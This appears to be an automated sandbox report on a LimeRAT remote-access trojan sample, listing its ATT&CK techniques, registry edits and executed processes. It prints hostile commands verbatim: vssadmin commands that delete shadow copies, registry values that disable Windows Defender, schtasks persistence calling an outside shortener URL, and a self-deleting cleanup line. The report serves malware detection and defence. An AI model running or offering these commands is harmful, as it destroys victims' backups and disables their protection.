Malware Analysis Report

2024-09-11 10:00

Sample ID 240426-x3662sad99
Target Client.exe
SHA256 ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91
Tags
limerat evasion persistence ransomware rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91

Threat Level: Known bad

The file Client.exe was found to be: Known bad.

Malicious Activity Summary

limerat evasion persistence ransomware rat trojan

Contains code to disable Windows Defender

Limerat family

Modifies Windows Defender Real-time Protection settings

Modifies security service

LimeRAT

Modifies WinLogon for persistence

Deletes shadow copies

Checks computer location settings

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Interacts with shadow copies

Disables Windows logging functionality

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Scheduled Task/Job
T1053
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Winlogon Helper DLL
T1547.004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Winlogon Helper DLL
T1547.004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Indicator Removal
T1070
File Deletion
T1070.004
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Remote System Discovery
T1018
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Inhibit System Recovery
T1490
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-04-26 19:23

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Limerat family

limerat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-26 19:23

Reported

2024-04-26 19:28

Platform

win10v2004-20240419-en

Max time kernel

299s

Max time network

300s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

LimeRAT

rat limerat

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\AdminMIcrosoft TeamsMIcrosoft Teams.exe\"" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\AdminMIcrosoft TeamsMIcrosoft Teams.exe\"" C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Deletes shadow copies

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Disables Windows logging functionality

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe N/A
N/A N/A C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe N/A
N/A N/A C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe N/A
N/A N/A C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeDebugPrivilege N/A C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2700 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 2388 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 3860 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 3860 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 2700 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\cmd.exe
PID 4028 wrote to memory of 4928 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4028 wrote to memory of 4928 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1080 wrote to memory of 3244 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1080 wrote to memory of 3244 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1236 wrote to memory of 2188 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1236 wrote to memory of 2188 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4492 wrote to memory of 4712 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4492 wrote to memory of 4712 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1480 wrote to memory of 4232 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1480 wrote to memory of 4232 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4924 wrote to memory of 3980 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4924 wrote to memory of 3980 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2388 wrote to memory of 4724 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2388 wrote to memory of 4724 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3860 wrote to memory of 2996 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3860 wrote to memory of 2996 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2900 wrote to memory of 4204 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2900 wrote to memory of 4204 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3400 wrote to memory of 4748 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3400 wrote to memory of 4748 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2872 wrote to memory of 2412 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2872 wrote to memory of 2412 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3588 wrote to memory of 3868 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3588 wrote to memory of 3868 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3820 wrote to memory of 2864 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3820 wrote to memory of 2864 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2700 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2700 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2700 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2700 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2700 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2700 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2700 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2700 wrote to memory of 1692 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2700 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2700 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\SYSTEM32\schtasks.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "17:16" /sc daily /mo "4" /tn "ACCBackgroundApplication" /tr "'explorer'https://gsurl.be/kXG3"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "10:34" /sc daily /mo "4" /tn "ACCBackgroundApplication" /tr "'explorer'https://gsurl.be/kXG3"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "23:36" /sc daily /mo "3" /tn "ACCBackgroundApplication" /tr "'explorer'https://gsurl.be/kXG3"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "21:51" /sc weekly /mo "4" /d "Wed" /tn "ACCBackgroundApplication" /tr "'explorer'https://gsurl.be/kXG3"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "03:56" /sc monthly /m "aug" /tn "ACCBackgroundApplication" /tr "'explorer'https://gsurl.be/kXG3"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe

"C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe"

C:\Windows\system32\PING.EXE

ping 0 -n 2

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 www.example.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 pastebin.com udp

Files

memory/2700-0-0x000002A0BFCA0000-0x000002A0BFCE4000-memory.dmp

memory/2700-1-0x00007FFD982B0000-0x00007FFD98D71000-memory.dmp

memory/2700-2-0x000002A0DA400000-0x000002A0DA410000-memory.dmp

memory/4016-3-0x00007FFD982B0000-0x00007FFD98D71000-memory.dmp

memory/4016-5-0x0000024D7D6C0000-0x0000024D7D6D0000-memory.dmp

memory/4016-4-0x0000024D7D6C0000-0x0000024D7D6D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ios3r5dc.vss.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4016-15-0x0000024D7DE00000-0x0000024D7DE22000-memory.dmp

memory/4016-18-0x00007FFD982B0000-0x00007FFD98D71000-memory.dmp

memory/2700-20-0x00007FFD982B0000-0x00007FFD98D71000-memory.dmp

memory/2700-21-0x000002A0DA400000-0x000002A0DA410000-memory.dmp

C:\Users\AdminMIcrosoft TeamsMIcrosoft Teams.exe

MD5 7746b64cfda991754c277e8dbfcb12bf
SHA1 f3d05a15cf7c4f1d07bca938076cb53df9c39e16
SHA256 ba34bf8ee0d74e9978464c7daa4c0f44cfeafbb2096364ee58432fd6ebbced91
SHA512 04b7a7dc507c150cc21217ba41a2f0cc7448f59e5b62e2f9279540a1cd2ed4b02b56d1d20ce901f09f6e347fb6e7208bfc08f1ecf814810af9ae05cf54327334

memory/2700-33-0x00007FFD982B0000-0x00007FFD98D71000-memory.dmp